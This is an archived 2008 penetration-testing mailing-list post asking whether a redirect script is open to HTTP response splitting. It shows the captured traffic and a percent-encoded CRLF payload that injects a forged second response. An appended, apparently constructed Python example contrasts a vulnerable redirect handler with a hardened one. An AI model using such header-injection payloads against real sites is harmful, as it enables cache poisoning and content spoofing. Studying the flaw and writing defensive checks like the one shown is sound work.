Penetration Testing mailing list archives
Is there a HTTP Response Splitting Flaw?
From: bin4ry () theknetgroup org
Date: 29 Apr 2008 06:46:18 -0000
Hi together, I'm new to this community as well as to pen-testing. I've already done some jobs for smaller companies and IT infrastructures. Now I have to pen-test a website. I need to perform a black-box test and I've already found some XSS and some SQL injection bugs which I've reported to the site admin. Now I believe that there's an HTTP response splitting flaw as well. I found this suspicious resource:

foo.bar/accept?dest=/xy/z

This looks like a redir-script, right? So this is what I get:

GET foo.bar/accept?dest=/xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily <<<<<< looks suspicious
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:09:42 GMT
Location: foo.bar/xy/z <<<<<<<
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Runtime: 0.39293
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from prx-deka-02.f.ddk
----------------------------------------------------------
GET /xy/z HTTP/1.1 <<<<< that's it, right?
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "e7346ba9885de32fe8d51358b8a409af"

HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy
Via: A_PROXY
Date: Fri, 25 Apr 2008 12:09:42 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "e7346ba9885de32fe8d51358b8a409af"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS from A_PROXY

Till now everything looks like a response splitting flaw. That's why I pass this one to $dest:

/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E

Which is:

/xy/z

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: no-cache
Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
Content-Length: 36
<html>HTTP Response Splitting</html>

So, again our HTTP traffic, now with an injected HTTP header:

GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:07:47 GMT
Location: foo.bar/de/xy/z
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from A_PROXY
----------------------------------------------------------
GET /xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"

HTTP/1.x 304 Not Modified
Via: 1.0 A_PROXY
Date: Fri, 25 Apr 2008 12:07:48 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS A_PROXY

As you can see, the injected header won't be matched to the HTTP request from the redir-script. I tried several CRLF types: %0d%0a, %0a%0a and %0a, but as we can see this is a Linux box, therefore %0d%0a should work. There's a squid between me and foo.bar. The whitepaper from Sanctum says that squid has a packet boundary approach and messages are read as packets, and therefore injected headers may need to be padded. Can someone help me out? Thx

P.S.: And another question. Since I am not really familiar with response splitting, I'd like to ask you whether the risk of response splitting is always present when a script utilizes user input to form a new address which is the target of a redirection script, which manifests in an HTTP 302 header from the server?

Thanks and greetings to the community from Germany.
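Added example, not code from the post or from the tested site: a minimal Python model of the dest= redirector the post describes, showing why a Location header built from the percent-decoded parameter splits into two responses once the parameter carries an encoded CR LF, beside the validation that removes that risk (the risk the P.S. asks about exists exactly when the decoded input reaches the header unchecked). Function names and the sample inputs are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

CRLF = "\r\n"

def naive_redirect(dest: str) -> str:
    """Vulnerable pattern: the percent-decoded parameter is pasted into Location."""
    target = unquote(dest)  # %0d%0a becomes a literal CR LF at this point
    return (f"HTTP/1.1 302 Moved Temporarily{CRLF}"
            f"Location: {target}{CRLF}"
            f"Content-Type: text/html; charset=utf-8{CRLF}{CRLF}")

def safe_redirect(dest: str) -> str:
    """Hardened: decode, then accept only a control-character-free local path."""
    target = unquote(dest)
    # Any CR, LF or other control byte would start a new header line or response.
    if re.search(r"[\x00-\x1f\x7f]", target):
        raise ValueError("control character in redirect target")
    parts = urlsplit(target)
    # No scheme, no host and no protocol-relative "//host": same-site paths only.
    if parts.scheme or parts.netloc or not target.startswith("/"):
        raise ValueError("redirect target must be a local absolute path")
    return (f"HTTP/1.1 302 Moved Temporarily{CRLF}"
            f"Location: {target}{CRLF}"
            f"Content-Type: text/html; charset=utf-8{CRLF}{CRLF}")

def is_rejected(dest: str) -> bool:
    """True when the hardened handler refuses this dest value."""
    try:
        safe_redirect(dest)
    except ValueError:
        return True
    return False

def count_status_lines(raw: str) -> int:
    """Number of HTTP status lines a client or proxy would see in this byte stream."""
    return len(re.findall(r"^HTTP/1\.[01] \d{3}", raw, flags=re.MULTILINE))

# Constructed inputs: the first is the post's normal target, the second carries
# an encoded CR LF CR LF followed by a second status line, like the post's test value.
CLEAN_DEST = "/xy/z"
SPLIT_DEST = "/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Length:%200%0d%0a%0d%0a"

if __name__ == "__main__":
    print("naive, clean :", count_status_lines(naive_redirect(CLEAN_DEST)), "response(s)")
    print("naive, split :", count_status_lines(naive_redirect(SPLIT_DEST)), "response(s)")
    print("safe, clean  :", count_status_lines(safe_redirect(CLEAN_DEST)), "response(s)")
    print("safe, split  : rejected =", is_rejected(SPLIT_DEST))
```

Whether the second status line is actually cached or delivered separately then depends on how the proxy in between frames the stream, which is the Squid behaviour the post asks about; the server-side check makes that question moot.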
Current thread:
- Is there a HTTP Response Splitting Flaw? bin4ry (Apr 29)
- Re: Is there a HTTP Response Splitting Flaw? Gleb Paharenko (Apr 30)